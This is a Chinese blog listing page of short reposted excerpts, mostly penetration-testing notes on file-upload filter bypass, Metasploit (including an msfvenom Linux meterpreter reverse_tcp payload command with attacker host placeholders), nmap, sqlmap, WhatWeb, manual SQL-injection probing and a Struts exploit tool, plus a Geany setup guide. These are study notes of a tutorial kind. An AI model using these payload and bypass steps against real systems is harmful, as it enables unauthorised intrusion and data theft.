自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

转载 web-文件上传漏洞总结

思维导图:一,js验证绕过1.我们直接删除代码中onsubmit事件中关于文件上传时验证上传文件的相关代码即可。或者可以不加载所有js,还可以将html源码copy一份到本地,然后对相应代码进行修改,本地提交即可。2.burp改包,由于是js验证,我们可以先将文件重命名为js允许的后缀名,在用burp发送数据包时候改成我们想要的后...

2019-09-25 15:22:00 195

转载 metasploit进阶之路

1.口令安全search mysql_login ssh_login2.hash传递渗透hashdump3.内核提权getsystem4.后门生成linux:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On...

2019-09-17 15:20:00 165

转载 nmap进阶之路

1.namp 列举远程机器开放的端口--dns-servers 8.8.8.8(使用指定域名)-Pn:停止探测之前的ICMP请求,已达到不触发防火墙安全机制-p:指定端口or范围namp 识别目标机器上的服务指纹-T(1-5)加快探测速度-sC -sV -o :-sC:使用默认探测脚本==--script-default== -sS -PO -A -v2.namp发现局域网存活的主机...

2019-09-12 08:38:00 195

转载 sqlmap进阶之路

1.sqlmap直接数据库,文件读取目标 -l ,-x(xml站点地图),-m(多行文本url),-r, url探测 --banner(t探测数据库), -g(Google)批量扫描注入2,使用post方式时可以指定分隔符 --pa'ram-del="&" , bp截取的文件参数后面加*如同 使用--level 3 检测cookie注入, --heads 可以设置额外的http...

2019-09-01 12:20:00 385

转载 渗透测试面试基础知识

一,SQL注入的原理和防御机制原理:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,达到欺骗服务器执行恶意的SQL命令防御机制:1.对用户输入的数据类型做严格限制 2.使用预编译绑定变量的SQL语句 3.过滤特殊字符 4.数据库信息加密,使用数据库防火墙,web防火...

2019-06-10 19:19:00 419

转载 Whatweb网站指纹信息收集工具

常规扫描:whatweb www.baidu.com批量扫描: whatweb -i /root/12.txt详细回显扫描:whatweb -v www.baidu.com加强扫描强度:whatweb -a 3 -v www.baidu.com快速扫描本地主机: whatweb --no-errors -t 255 网段将扫描结果导入文件: whatweb w...

2019-05-30 18:56:00 1096

转载 手工sql注入判断是否存在注入点

1.加入单引号’提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞。2.数字型判断是否有注入;语句:and1=1;and1=2(经典)、'and'1'=1(字符型)结果:分别返回不同的页面,说明存在注入漏洞.分析:and的意思是“和”如果没有过滤我们的语句,and1=1就会被代入SQL查询语句进行查询,如果and前后的两条语句都是真的话就不会出错,但如果前后语句有...

2019-05-19 16:20:00 7102

转载 关于Struts漏洞工具的使用

最新struts-scan资源:https://www.cesafe.com/3486.html一,将资源下载后,放入liunx系统中,并且需要具备python2的操作环境二,打开终端使用如下命令即可对于struts工具进行使用(建议已经确定网站存在struts漏洞在进行工具利用) 1.python struts-scan.py http://example.com/...

2019-05-18 11:40:00 458

转载 Windwos10环境下的Geany的安装与新手使用

相信学习Python的小伙伴都会接触到Geany这个轻量级的python文本编辑器吧,下面就是我对于安装Geany的一些小经验分享。1:安装geany很简单,进入geany官网download下载相应版本即可。2:安装好geany后,就对python环境的配置了,我的是windwos10的操作系统,设置生成命令记得把python路径后的.exe删除,如下:编辑(comp...

2019-05-09 10:01:00 521

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除